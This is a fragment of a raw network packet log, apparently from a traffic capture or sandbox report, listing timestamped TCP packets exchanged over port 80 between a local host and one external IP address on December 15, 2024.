                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.120579958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.120625973 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.121824026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.121840000 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.121877909 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.122914076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.122925043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.122953892 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.124149084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.124161005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.124190092 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.125130892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.125180006 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.125227928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.126332998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.126343966 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.126415014 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.127382040 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.127441883 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.127836943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.128588915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.128598928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.128642082 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.129786968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.129801989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.129838943 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.131012917 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.131078959 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.131086111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.132100105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.132113934 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.132137060 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.133172989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.133239031 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.133667946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.134341002 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.134387016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.134433985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.135555029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.135598898 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.135608912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.136846066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.136859894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.136892080 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.137929916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.137944937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.137974977 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.139098883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.139110088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.139148951 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.140276909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.140290022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.140333891 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.141379118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.141432047 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.141483068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.142534971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.142582893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.142656088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.143754005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.143799067 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.143810034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.144830942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.144922972 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.145091057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.146003008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.146078110 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.146143913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.147211075 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.147273064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.147294044 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.148302078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.148349047 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.148401976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.149466991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.149523020 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.149555922 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.150727987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.150748014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.150774956 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.151757002 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.151809931 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.151837111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.152991056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.153064966 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.153090954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.154115915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.154164076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.154175043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.155256033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.155303955 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.155374050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.156502962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.156522036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.156548023 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.157686949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.157706022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.157740116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.158720970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.158768892 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.158780098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.160012960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.160034895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.160060883 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.161103964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.161165953 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.161453009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.162408113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.162426949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.162460089 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.163548946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.163568020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.163589954 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.164580107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.164633036 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.164661884 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.165885925 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.165936947 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.166107893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.166894913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.166948080 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.166965008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.168011904 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.168081999 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.168163061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.169239998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.169289112 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.169356108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.170340061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.170399904 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.170547009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.171643972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.171684980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.171704054 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.172700882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.172763109 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.172813892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.223751068 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.305000067 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.305016041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.305354118 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.305387020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.306224108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.306437969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.306785107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.306799889 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.306893110 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.307739973 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.307981014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.308749914 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.308996916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.309011936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.309135914 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.310033083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.310162067 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.310345888 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.311212063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.311386108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.311537981 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.312397957 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.312448978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.312890053 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.313574076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.313704014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.314673901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.314789057 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.314816952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.314949989 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.315812111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.315951109 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.316127062 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.316973925 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.317106009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.317300081 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.318166018 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.318316936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.319339991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.319441080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.319478989 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.319766998 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.320538044 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.320687056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.321698904 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.321789980 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.321873903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.321970940 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.322843075 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.322907925 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.323937893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.324064970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.324095011 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.324382067 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.325290918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.325393915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.325566053 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.326374054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.326518059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.326699018 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.327588081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.327678919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.327904940 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.328592062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.328772068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.328964949 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.329761982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.329907894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.330926895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.331068993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.331095934 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.331342936 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.332134008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.332248926 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.333225012 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.333355904 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.333503008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.333905935 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.334431887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.334517002 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.334604979 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.335619926 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.335758924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.336743116 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.336770058 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.336987019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.337901115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.337981939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.338009119 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.339066982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.339374065 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.339399099 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.339472055 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.340246916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.340403080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.340631962 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.341377020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.341480017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.341607094 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.342643023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.342663050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.342823029 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.343810081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.343828917 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.344022989 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.344944000 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.345001936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.345098972 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.346045017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.346127987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.346246958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.347206116 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.347291946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.347603083 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.348484039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.348503113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.348716974 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.349625111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.349647045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.349735975 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.350689888 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.350833893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.351135015 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.351861000 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.352081060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.352260113 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.353044987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.353722095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.354192972 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.354298115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.354312897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.355325937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.355427027 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.355446100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.356508017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.356626034 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.356652975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.356775045 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.357624054 CET8049708185.81.68.147192.168.2.5
